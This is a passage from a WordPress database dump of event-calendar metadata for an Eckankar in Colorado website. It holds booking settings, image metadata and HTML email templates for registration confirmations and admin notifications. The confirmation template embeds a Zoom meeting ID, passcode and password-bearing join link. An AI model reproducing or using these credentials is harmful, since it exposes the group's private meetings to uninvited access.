'mec_repeat_type',''),(179852,268244,'mec_repeat_interval','1'),(179853,268244,'mec_repeat_end',''),(179854,268244,'mec_repeat_end_at_occurrences',''),(179855,268244,'mec_repeat_end_at_date',''),(179856,268244,'mec_advanced_days','a:0:{}'),(179857,268244,'mec_in_days',''),(179858,268244,'mec_not_in_days',''),(179859,268244,'mec_hourly_schedules','a:0:{}'),(179860,268244,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(179861,268244,'mec_tickets','a:0:{}'),(179862,268244,'mec_fees_global_inheritance','1'),(179863,268244,'mec_fees','a:0:{}'),(179864,268244,'mec_ticket_variations_global_inheritance','1'),(179865,268244,'mec_ticket_variations','a:0:{}'),(179866,268244,'mec_reg_fields_global_inheritance','1'),(179867,268244,'mec_reg_fields','a:0:{}'),(179868,268244,'mec_bfixed_fields','a:0:{}'),(179869,268244,'mec_op','a:0:{}'),(179870,268244,'mec_fields','a:0:{}'),(179871,268244,'mec_event_status','EventScheduled'),(179872,268244,'mec_moved_online_link',''),(179873,268244,'mec_cancelled_reason',''),(179874,268244,'mec_display_cancellation_reason_in_single_page',''),(179875,268244,'boldgrid_hide_page_title','0'),(179876,268244,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(179877,268244,'passster_activate_global_protection',NULL),(179878,268244,'passster_activate_protection',NULL),(179879,268244,'passster_protection_type','password'),(179880,268244,'boldgrid_in_page_containers','1'),(179881,268244,'passster_area_shortcode',''),(179882,268244,'_thumbnail_id','268245'),(179884,268244,'_dp_original','268243'),(179885,268244,'_edit_lock','1679631619:15'),(179886,268244,'_edit_last','15'),(179887,268245,'_wp_attached_file','2023/03/Pyramid.webp'),(179888,268245,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:337;s:4:\"file\";s:20:\"2023/03/Pyramid.webp\";s:8:\"filesize\";i:12392;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"Pyramid-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5180;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Pyramid-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3302;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:20:\"Pyramid-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8008;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:20:\"Pyramid-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11094;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:20:\"Pyramid-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8548;}s:8:\"tileview\";a:5:{s:4:\"file\";s:20:\"Pyramid-300x337.webp\";s:5:\"width\";i:300;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10242;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179889,268246,'mec_color',''),(179890,268246,'mec_location_id','118'),(179891,268246,'mec_dont_show_map','0'),(179892,268246,'mec_organizer_id','1'),(179893,268246,'mec_read_more',''),(179894,268246,'mec_more_info',''),(179895,268246,'mec_more_info_title',''),(179896,268246,'mec_more_info_target','_self'),(179897,268246,'mec_cost',''),(179898,268246,'mec_currency','a:0:{}'),(179899,268246,'mec_additional_organizer_ids','a:0:{}'),(179900,268246,'mec_additional_location_ids','a:0:{}'),(179901,268246,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-18\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-18\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(179902,268246,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(179903,268246,'mec_certain_weekdays','a:0:{}'),(179904,268246,'mec_allday','0'),(179905,268246,'one_occurrence','0'),(179906,268246,'mec_hide_time','0'),(179907,268246,'mec_hide_end_time','0'),(179908,268246,'mec_comment',''),(179909,268246,'mec_timezone','global'),(179910,268246,'mec_countdown_method','global'),(179911,268246,'mec_public','1'),(179912,268246,'mec_start_date','2023-04-18'),(179913,268246,'mec_start_time_hour','3'),(179914,268246,'mec_start_time_minutes','0'),(179915,268246,'mec_start_time_ampm','PM'),(179916,268246,'mec_start_day_seconds','54000'),(179917,268246,'mec_end_date','2023-04-18'),(179918,268246,'mec_end_time_hour','4'),(179919,268246,'mec_end_time_minutes','0'),(179920,268246,'mec_end_time_ampm','PM'),(179921,268246,'mec_end_day_seconds','57600'),(179922,268246,'mec_repeat_status','0'),(179923,268246,'mec_repeat_type',''),(179924,268246,'mec_repeat_interval','1'),(179925,268246,'mec_repeat_end',''),(179926,268246,'mec_repeat_end_at_occurrences',''),(179927,268246,'mec_repeat_end_at_date',''),(179928,268246,'mec_advanced_days','a:0:{}'),(179929,268246,'mec_in_days',''),(179930,268246,'mec_not_in_days',''),(179931,268246,'mec_hourly_schedules','a:0:{}'),(179932,268246,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(179933,268246,'mec_tickets','a:0:{}'),(179934,268246,'mec_fees_global_inheritance','1'),(179935,268246,'mec_fees','a:0:{}'),(179936,268246,'mec_ticket_variations_global_inheritance','1'),(179937,268246,'mec_ticket_variations','a:0:{}'),(179938,268246,'mec_reg_fields_global_inheritance','1'),(179939,268246,'mec_reg_fields','a:0:{}'),(179940,268246,'mec_bfixed_fields','a:0:{}'),(179941,268246,'mec_op','a:0:{}'),(179942,268246,'mec_fields','a:0:{}'),(179943,268246,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9934:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(179944,268246,'mec_event_status','EventScheduled'),(179945,268246,'mec_moved_online_link',''),(179946,268246,'mec_cancelled_reason',''),(179947,268246,'mec_display_cancellation_reason_in_single_page',''),(179948,268246,'protect_children',''),(179949,268246,'passster_activate_global_protection',NULL),(179950,268246,'passster_activate_protection',NULL),(179951,268246,'passster_protection_type','password'),(179952,268246,'boldgrid_hide_page_title','0'),(179953,268246,'_thumbnail_id','268247'),(179954,268246,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(179955,268246,'boldgrid_in_page_containers','1'),(179956,268246,'passster_area_shortcode',''),(179958,268246,'_dp_original','268216'),(17